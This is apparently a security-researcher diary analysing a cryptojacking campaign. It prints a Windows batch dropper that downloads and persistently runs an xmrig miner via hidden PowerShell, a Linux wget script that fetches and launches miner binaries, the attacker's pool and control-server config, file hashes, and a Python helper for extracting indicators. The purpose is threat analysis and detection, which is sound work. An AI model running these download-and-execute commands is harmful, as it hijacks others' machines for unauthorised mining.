Mining or Nothing!
Cryptocurrency mining has been a trending attack for a few weeks. Our idle CPUs are now targeted by bad guys looking to generate some extra revenue by abusing our resources. Other fellow handlers already posted diaries about this topic: Renato found a campaign based on a WebLogic exploit[1] and Jim detected a peak of activity on port 3333[2]. Yesterday, while reviewing alerts generated by my hunting scripts, I found an interesting snippet of code on Pastebin. Here is a copy of the script with some added comments (the lines starting with //):

```batch
@shift /0
@echo off
// No idea why a new service is created, there is no reference to this executable?
sc create MicrsoftFTP binPath= C:\ProgramData\svchost.exe start= auto
// Let's grab the miner
// Not very efficient because admin privileges are required to dump the file in this directory
powershell.exe -WindowStyle Hidden $P = nEW-oBJECT sYSTEM.nET.wEBcLIENT;$P.DownloadFile('http://x.x.x.x:2114/drivers.exe', 'C:\Windows\drivers.exe')
ping 1.1.1.1 -n 10>nul 2>nul
set _task=drivers.exe
// Miner configuration
set _svr=C:\Windows\drivers.exe -o bom.dnstop[.]info:4555 -u 4BHZCKCaArVd84u …(removed)... bydit7sHgu4BAo5Rh -p x -k -B
set _des=start.bat
:checkstart
SET status=1
// Test if the miner is running
(TASKLIST|FIND /I "%_task%"||SET status=0) 2>nul 1>nul
ECHO %status%
// If not running, (re)start it or sleep
IF %status% EQU 1 (goto checkag ) ELSE (goto startsvr)
// Create the start.bat script and launch the miner
:startsvr
echo %time%
// Original strings were in Chinese
// Translation: "******** Program started ********"
echo ********??????********
// Translation: "The program restarts at %time%, check the system log"
echo ??????? %time% ,??????? >> restart_service.txt
echo start %_svr% > %_des%
echo exit >> %_des%
start %_des%
set/p=.<nul
for /L %%i in (1 1 10) do set /p a=.<nul&ping.exe /n 2 127.0.0.1>nul
echo .
echo Wscript.Sleep WScript.Arguments(0) >%tmp%\delay.vbs
cscript //b //nologo %tmp%\delay.vbs 10000
del %_des% /Q
// Translation: "******** Program completed ********"
echo ********??????********
goto checkstart
// Simple sleep function based on a VBS one-liner script
:checkag
// Translation: "%time% The program is running normally, and it will be checked after 10 seconds."
echo %time% ??????,10??????..
echo Wscript.Sleep WScript.Arguments(0) >%tmp%\delay.vbs
cscript //b //nologo %tmp%\delay.vbs 10000
goto checkstart
:begin
REM
```
The file referenced in the script ('drivers.exe') is not available anymore (the server returns HTTP 404), but the server is running an HttpFileServer[3] instance, which is very popular in China (I found plenty of them on Chinese servers).
You can see multiple files and installation scripts to deploy mining tools on Windows but also on Linux boxes. Example:

```sh
cd /tmp
wget -O xmrigDaemon http://x.x.x.x:2114/xmrigDaemon && chmod +x xmrigDaemon
wget -O xmrigMiner http://x.x.x.x:2114/xmrigMiner && chmod +x xmrigMiner
wget -O config.json http://x.x.x.x:2114/config.json && chmod +x config.json
chmod +x xmrigDaemon
chmod +x xmrigMiner
chmod +x config.json
./xmrigDaemon &
```
Even more interesting, the configuration is publicly available (config.json) and contains a lot of details about the attacker:
```json
{
    "algo": "cryptonight",  // cryptonight (default) or cryptonight-lite
    "av": 0,                // algorithm variation, 0 auto select
    "doublehash-thread-mask" : null, // for av=2/4 only, limits doublehash to given threads (mask), mask "0x3" means run doublehash on thread 0 and 1 only (default: all threads)
    "background": true,     // true to run the miner in the background
    "colors": true,         // false to disable colored output
    "cpu-affinity": null,   // set process affinity to CPU core(s), mask "0x3" for cores 0 and 1
    "cpu-priority": null,   // set process priority (0 idle, 2 normal to 5 highest)
    "donate-level": 1,      // donate level, mininum 1%
    "log-file": null,       // log all output to a file, example: "c:/some/path/xmrig.log"
    "max-cpu-usage": 100,   // maximum CPU usage for automatic mode, usually limiting factor is CPU cache not this option.
    "print-time": 60,       // print hashrate report every N seconds
    "retries": 5,           // number of times to retry before switch to backup server
    "retry-pause": 5,       // time to pause between retries
    "safe": false,          // true to safe adjust threads and av settings for current CPU
    "syslog": false,        // use system log for output messages
    "threads": null,        // number of miner threads
    "pools": [
        {
            "url": "bom.dnstop[.]info:2222",   // URL of mining server
            "user": "4BHZCKCaArVd84uydsakdzVHRtBJqG …(removed)… 3bBJJESH28YHbydit7sHgu4BAo5Rh",   // username for mining server
            "pass": "Lall …(removed)… ",   // password for mining server
            "keepalive": true,   // send keepalived for prevent timeout (need pool support)
            "nicehash": false    // enable nicehash/xmrig-proxy support
        }
    ],
    "api": {
        "port": 0,              // port for the miner API https://github.com/xmrig/xmrig/wiki/API
        "access-token": null,   // access token for API
        "worker-id": null       // custom worker-id for API
    },
    "cc-client": {
        "url": "bom.dnstop.info:3324",   // url of the CC Server (ip:port)
        "access-token": "mySecret",      // access token for CC Server (has to be the same in config_cc.json)
        "worker-id": null,               // custom worker-id for CC Server (otherwise hostname is used)
        "update-interval-s": 10          // status update interval in seconds (default: 10 min: 1)
    }
}
```
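As an added example (not code from the diary), here is a small Python helper that pulls the network indicators out of both artifacts above for blocklisting and hunting: it strips the // comments that xmrig allows in config.json before parsing it, and extracts the service name, download URL, pool and wallet from the batch dropper with regular expressions. The inputs are constructed samples modelled on the snippets above; the wallet value is a placeholder.

```python
import json
import re

# Constructed samples modelled on the diary's artifacts; hosts and wallet are placeholders.
BATCH_SNIPPET = r"""
sc create MicrsoftFTP binPath= C:\ProgramData\svchost.exe start= auto
powershell.exe -WindowStyle Hidden $P = nEW-oBJECT sYSTEM.nET.wEBcLIENT;$P.DownloadFile('http://x.x.x.x:2114/drivers.exe', 'C:\Windows\drivers.exe')
set _svr=C:\Windows\drivers.exe -o bom.dnstop[.]info:4555 -u 4BHZCKCaArVd84uPLACEHOLDER -p x -k -B
"""

XMRIG_CONFIG = """{
    "algo": "cryptonight",                 // cryptonight (default) or cryptonight-lite
    "pools": [
        { "url": "bom.dnstop[.]info:2222", // URL of mining server
          "user": "4BHZCKCaArVd84uPLACEHOLDER", "pass": "x", "keepalive": true }
    ],
    "cc-client": { "url": "bom.dnstop[.]info:3324", "access-token": "mySecret" }
}"""

def strip_json_comments(text):
    """xmrig's config.json carries // comments that json.loads rejects; drop them,
    but only outside string literals (a URL inside a value keeps its //)."""
    out, in_str, i = [], False, 0
    while i < len(text):
        if text[i] == '"' and not (i and text[i - 1] == "\\"):
            in_str = not in_str
        if not in_str and text.startswith("//", i):
            i = text.find("\n", i)          # skip to end of line (keeps the newline)
            if i < 0:
                break
            continue
        out.append(text[i])
        i += 1
    return "".join(out)

def config_indicators(raw):
    """Pool URLs and wallets, plus the xmrigCC control server if one is configured."""
    cfg = json.loads(strip_json_comments(raw))
    iocs = {"pools": [(p["url"], p.get("user", "")) for p in cfg.get("pools", [])]}
    if "cc-client" in cfg:                   # xmrigCC variant: a second network indicator
        iocs["cc_server"] = cfg["cc-client"].get("url")
    return iocs

def batch_indicators(text):
    """Service name, download URLs, pool and wallet from the batch dropper."""
    return {
        "services": re.findall(r"sc create (\S+)", text, re.I),
        "downloads": re.findall(r"https?://[^\s'\"]+", text),
        "pools": re.findall(r"\s-o\s+(\S+)", text),
        "wallets": re.findall(r"\s-u\s+(\S+)", text),
    }
```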
Here is a table with the file details:
Name | MD5 | Type | VT Score |
---|---|---|---|
discuz | 588dcdd23deb25d99b0924ef96e4681f | ELF 32bits | Unknown |
discuz.exe | 08855aa283b692347bcabb48d6f8bcdf | PE32 | 52/68 |
lpost.exe | 6a33d25fa28fd865a5e2fa43250e64dd | PE32 | 51/68 |
master.exe | b5cc55f84c0d4f4b86f76956f94b170d | PE32 | 42/68 |
ss1s.exe | bb2d8d8c8087073d83a7226c4a44296b | PE32 | 15/67 |
svchost.exe | 6a33d25fa28fd865a5e2fa43250e64dd | PE32 | 51/68 |
xmrigDaemon | 7dc04d39f2786eceab4fbf2cf16eded6 | ELF 32bits | Unknown |
xmrigDaemon-2 | 710f2be21798478cc2f534ee2eb7b800 | ELF 64bits | 1/60 |
xmrigMiner | b87982f5f938b2a7c9852a5de63bbc68 | ELF 32bits | Unknown |
xmrigMiner-2 | f8cb16918b42505abe547da37b9614a9 | ELF 64bits | 14/60 |
[1] https://isc.sans.edu/forums/diary/Campaign+is+using+a+recently+released+WebLogic+exploit+to+deploy+a+Monero+miner/23191/
[2] https://isc.sans.edu/forums/diary/What+is+going+on+with+port+3333/23215/
[3] http://rejetto.com/hfs/
Xavier Mertens (@xme)
ISC Handler - Freelance Security Consultant